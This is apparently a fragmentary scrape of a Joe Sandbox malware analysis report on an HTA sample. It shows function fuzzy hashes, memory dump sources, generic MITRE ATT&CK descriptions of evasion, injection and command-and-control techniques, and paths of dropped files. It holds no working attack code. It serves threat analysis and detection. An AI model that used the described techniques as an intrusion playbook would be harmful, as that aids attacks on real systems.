Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: D0917471E002169EEB24DF6DC881ABEBBA5BF88720F54451EEB65EF2C0D73099418751

Function 015B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 015B9175
$, xrefs: 015B9191

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 59316161dde27329b05bec0caccab7ffbc4f37731d891414f151715a1a97b7ee
Instruction ID: 69bcafe6fa7b449c731825176badc45028a63fbc7544affb5f43b2f8240ebe69
Opcode Fuzzy Hash: 59316161dde27329b05bec0caccab7ffbc4f37731d891414f151715a1a97b7ee
Instruction Fuzzy Hash: 62811BB1D0026A9BDB31CF54CC55BEEBAB4BF48714F1445DAAA19B7280D7305E84CFA0

Function 0163CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0163CFBD

Strings

@, xrefs: 0163CF0A
@4rw@4rw, xrefs: 0163CFD5, 0163CFDA, 0163CFF1

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4rw@4rw
API String ID: 4062629308-2979693914
Opcode ID: 30d4ba55b21ad907066f99ec055f5d8b352470dfbd915276a0474db095381a89
Instruction ID: 57e68cd5500303230fb3a95895dfa2d2f44efc6ffb0b73860813e34a3605cd5c
Opcode Fuzzy Hash: 30d4ba55b21ad907066f99ec055f5d8b352470dfbd915276a0474db095381a89
Instruction Fuzzy Hash: 9F41577190021A9FDB219FA9CC40AAAFBB9FF95B50F44402EEA15EB354E774D801CB61

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report seemebestthingsgivenmegood.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestmagicalthignsgivegoodforu[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESE7FE.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rdnpvo.v0l.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5bged2a.yxp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvs4oach.wly.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qidq0t0g.zxw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svm3ycn4.xww.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uks12bjz.ms2.psm1

C:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP

Windows Analysis Report
seemebestthingsgivenmegood.hta

Function 046B7A18 Relevance: 1.9, APIs: 1, Instructions: 362
COMMON

Function 074E4610 Relevance: 7.9, Strings: 6, Instructions: 439
COMMON

Function 074E45AC Relevance: 4.0, Strings: 3, Instructions: 251
COMMON